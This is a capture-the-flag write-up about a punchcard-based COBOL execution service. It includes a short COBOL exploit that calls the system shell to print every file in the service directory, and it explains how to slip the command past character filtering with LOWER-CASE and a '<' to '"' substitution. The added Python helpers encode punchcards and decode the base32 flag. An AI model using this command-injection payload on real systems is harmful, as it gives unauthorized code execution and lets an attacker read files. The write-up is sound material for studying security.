We analyzed the Python source code and observed these key points:
First, we will describe our solution, and then we will provide more details on how we created it.
We generated a sequence of punchcards with the COBOL exploit encoded on them, one line of code on each card; some tabulation was also required to get past the syntax errors COBOL generated. The exploit itself is pretty simple:
IDENTIFICATION DIVISION.
PROGRAM-ID. HELLO.
PROCEDURE DIVISION. BEGIN.
CALL >SYSTEM> USING
FUNCTION LOWER-CASE(>FIND . -TYPE F -EXEC CAT {} \;>). STOP RUN.
To send this script we generated 5 punchcards, one for each line. The script shows us the contents of every file in the service's directory. With it we basically have RCE and can do much more than simply print file contents.
To generate valid punchcards we used a script that can be found by simply googling "python generate punchcard".
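As an added illustration of what such a generator has to do (this is not the script the writeup used, and the image format the service actually parses is unknown to me), the following encodes one line of text column by column using the standard IBM 029 Hollerith keypunch code: 12 rows per column, zone rows 12/11/0 plus digit rows 1 to 9. Only the characters whose punch codes are certain (digits, upper-case letters, space, minus, period) are mapped; anything else raises instead of producing a silently wrong card.

```python
"""Added illustration (not the script from the writeup): encode one line of
text as an IBM 029-style Hollerith punch pattern, one column per character,
12 rows per column (rows 12, 11, 0, 1..9)."""

# Row labels in physical top-to-bottom order on an 80-column card.
ROWS = ["12", "11", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]

def _hollerith_table():
    """Build the character -> punched-rows table for the subset we are sure of:
    digits, upper-case letters, space, minus and period (IBM 029 keypunch)."""
    table = {" ": set()}                       # space: no hole
    for d in range(10):
        table[str(d)] = {str(d)}               # digit: its own row
    # A-I: zone 12 plus rows 1-9; J-R: zone 11 plus rows 1-9; S-Z: zone 0 plus rows 2-9.
    for i, ch in enumerate("ABCDEFGHI", start=1):
        table[ch] = {"12", str(i)}
    for i, ch in enumerate("JKLMNOPQR", start=1):
        table[ch] = {"11", str(i)}
    for i, ch in enumerate("STUVWXYZ", start=2):
        table[ch] = {"0", str(i)}
    table["-"] = {"11"}
    table["."] = {"12", "3", "8"}
    return table

HOLLERITH = _hollerith_table()

def encode_line(line, columns=80):
    """Return a 12 x columns grid of 0/1 (row order as in ROWS). Characters
    without a known punch code (including lower-case letters, which the
    keypunch code does not have) raise ValueError."""
    if len(line) > columns:
        raise ValueError("line longer than card")
    grid = [[0] * columns for _ in ROWS]
    for col, ch in enumerate(line):
        if ch not in HOLLERITH:
            raise ValueError(f"no punch code for {ch!r}")
        for row in HOLLERITH[ch]:
            grid[ROWS.index(row)][col] = 1
    return grid

def render(grid):
    """ASCII rendering: 'O' for a hole, '.' for no hole, one line per row."""
    return "\n".join(f"{label:>2} " + "".join("O" if v else "." for v in row)
                     for label, row in zip(ROWS, grid))

def decode_line(grid):
    """Inverse: read the punched rows of each column back to text."""
    reverse = {frozenset(v): k for k, v in HOLLERITH.items()}
    out = []
    for col in range(len(grid[0])):
        holes = frozenset(ROWS[r] for r in range(len(ROWS)) if grid[r][col])
        out.append(reverse.get(holes, "?"))
    return "".join(out).rstrip()

if __name__ == "__main__":
    card = encode_line("PROGRAM-ID. FLAG.")
    print(render(card))
    print(decode_line(card))
```

Running it prints the 12-row hole pattern for one COBOL line and reads it back; rendering the grid into an image the service accepts is the part that depends on the service and is left out here.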
The most important things that helped us solve the task:
- The HTTP request which the organisers sent to store flags. In the traffic we found these things:
  - an image of a valid punchcard, which the service can handle without error
  - the text encoded in these punchcards; it was on the HTML upload page, where a user can join some pieces and then run them. There we saw this kind of code:
IDENTIFICATION DIVISION.
PROGRAM-ID. FLAG.
DATA DIVISION. WORKING-STORAGE SECTION. 01 FLG.
05 FLGBASE32A PIC X(32) VALUE "IZAVKU2UL5ME63DWOBEVSQSTJNCFETLX".
05 FLGBASE32B PIC X(32) VALUE "IFAUCQKEIREDK5CEIJHDSSCSKZGEC===".
PROCEDURE DIVISION. BEGIN. DISPLAY FLG. STOP RUN.
This code was sent on punchcards, one line per card.
The flag consists of two base32-encoded parts, on lines 4 and 5. We determined that this code is in the COBOL programming language, and then we wrote our exploit in COBOL. It is worth mentioning that after the image is uploaded and before the COBOL code itself is executed, some internal transformation of the input happens (in .so files): some characters were discarded (like lowercase letters), some characters were translated into others, and some characters simply produced an error on the server. Empirically we found that the character `<` translates into `"`. The problem of dropped lowercase letters we solved by using COBOL's function LOWER-CASE on our shell command.
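As an added example (not part of the writeup), here is the decoding step made concrete: the level-05 VALUE literals are pulled out of the FLAG program shown above, each literal is checked against its declared PIC X width, and the two base32 halves are decoded separately (the second carries its own `===` padding, so decoding the concatenated string would fail) and joined, which is what DISPLAY FLG would print once the fields held the plaintext.

```python
"""Added example (not from the writeup): recover the flag from the two
base32 PIC X(32) fields of the FLAG program seen on the upload page.
The COBOL text is copied from the writeup."""
import base64
import re

FLAG_PROGRAM = """\
IDENTIFICATION DIVISION.
PROGRAM-ID. FLAG.
DATA DIVISION. WORKING-STORAGE SECTION. 01 FLG.
05 FLGBASE32A PIC X(32) VALUE "IZAVKU2UL5ME63DWOBEVSQSTJNCFETLX".
05 FLGBASE32B PIC X(32) VALUE "IFAUCQKEIREDK5CEIJHDSSCSKZGEC===".
PROCEDURE DIVISION. BEGIN. DISPLAY FLG. STOP RUN.
"""

# Elementary items of the FLG group: level 05, a name, PIC X(n), a quoted VALUE.
ITEM_RE = re.compile(r'05\s+(\w+)\s+PIC\s+X\((\d+)\)\s+VALUE\s+"([^"]*)"\.')

def extract_items(program):
    """Return [(name, value)] for every level-05 PIC X item in source order,
    rejecting a literal that does not fit its declared picture width."""
    items = []
    for name, width, value in ITEM_RE.findall(program):
        if len(value) > int(width):
            raise ValueError(f"{name}: literal longer than PIC X({width})")
        items.append((name, value))
    return items

def recover_flag(program):
    """DISPLAY FLG prints the group item, i.e. the fields back to back. Each
    field is an independent base32 blob, so decode them one at a time and
    join the decoded text."""
    parts = []
    for _, value in extract_items(program):
        parts.append(base64.b32decode(value).decode("ascii"))
    return "".join(parts)

if __name__ == "__main__":
    for name, value in extract_items(FLAG_PROGRAM):
        print(f"{name}: {value}")
    print(recover_flag(FLAG_PROGRAM))
```

The first field decodes to 20 bytes and the second, because of the padding, to 18, giving the 38-character flag.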